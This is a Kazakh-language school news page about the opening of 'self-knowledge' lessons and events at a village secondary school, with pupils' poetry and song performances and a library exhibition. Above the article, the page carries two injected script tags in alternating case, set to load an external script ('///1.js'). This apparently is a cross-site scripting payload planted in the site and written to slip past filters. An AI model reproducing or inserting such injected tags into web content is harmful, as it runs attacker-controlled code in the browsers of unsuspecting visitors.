<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.02.2018

Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 5-ақпан күні «Махаббат пен шығармашылық педагогикасы» тақырыбында өзін-өзі тану пәнінен шаралардың ашылуы өткізілді.

Шараның басты мақсаты: «Өзін-өзі тану» пәні бойынша рухани-адамгершілік білім берудің жаңартылған бағдарламасын оқыту-тәрбиелеу процесіне тиімді енгізу жұмысын белсенділендіру, әлеуметтік педагогика және өзін-өзі тану мұғалімдердің, жалпыадамзаттық құндылықтар туралы түсініктерін тереңдету, білімдерін арттыру, рухани тұрғыда дамыту.

Линейканы өзін-өзі тану мұғалімі Рахметова А.К ашып, жоғарғы сынып оқушылары Қуанышбаев Санжар мен Сұлтанбекова Айнагүл ұстаздар мен оқушыларды іс-шаралар жоспарымен таныстырып, Сара Алпысқызы туралы видео көрсетті.

Салтанатты линейкада 5 сынып оқушысы Әмірқаш Қалмұрат - М.Мақатаевтың «Ана» өлеңін мәнерлеп оқыса, 9 сынып оқушысы Біліспекова Перизат «Тәуелсіз Қазақстан» әнін орындап, оқушылардың қызығушылықтарын арттырды. Сонымен қатар кітапханашы Есенгулова Т.С осы іс-шараға арналған көрме ұйымдастырып, оқушылармен түсіндіру жұмыстарын жүргізді.

Просмотров: 521


Пікір қосу



Деректерді қолтаңбаға қосу